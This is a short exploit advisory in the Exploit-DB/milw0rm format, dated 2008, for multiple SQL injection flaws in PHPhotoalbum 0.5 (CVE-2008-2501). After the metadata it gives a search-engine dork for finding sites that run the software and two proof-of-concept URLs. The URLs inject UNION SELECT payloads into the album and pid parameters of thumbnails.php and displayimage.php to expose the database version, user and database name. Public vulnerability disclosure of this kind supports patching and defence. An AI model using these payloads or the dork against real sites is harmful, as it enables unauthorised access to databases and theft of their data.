PHPhotoalbum 0.5 - Multiple SQL Injections

Author: cOndemned
type: webapps
platform: php
port: 
date_added: 2008-05-27 
date_updated:  
verified: 1 
codes: OSVDB-45678;CVE-2008-2501;OSVDB-45677 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comPHPhotoalbum-0.5.zip

###############################################################################
#
#   Name   : PHPhotoalbum v0.5 Multiple Remote SQL Injection Vulnerabilities
#   Author : cOndemned
#   Dork   : intext:PHPhotoalbum v0.5
#   Greetz : ZaBeaTy, str0ke, TBH, Hawk, doctor, Sandtalker, Avantura ;**
#
###############################################################################

Proof of Concept :

    http://[host]/[path]/thumbnails.php?album=-1+union+select+concat_ws(0x10,now(),version(),user(),database())/*

    http://[host]/[path]/displayimage.php?pid=-1+union+select+1,2,3,now(),version(),user()/*


###############################################################################
#
# Together we stand tall, Not gonna crash, not gonna fall - Children of Bodom
#
###############################################################################

# milw0rm.com [2008-05-28]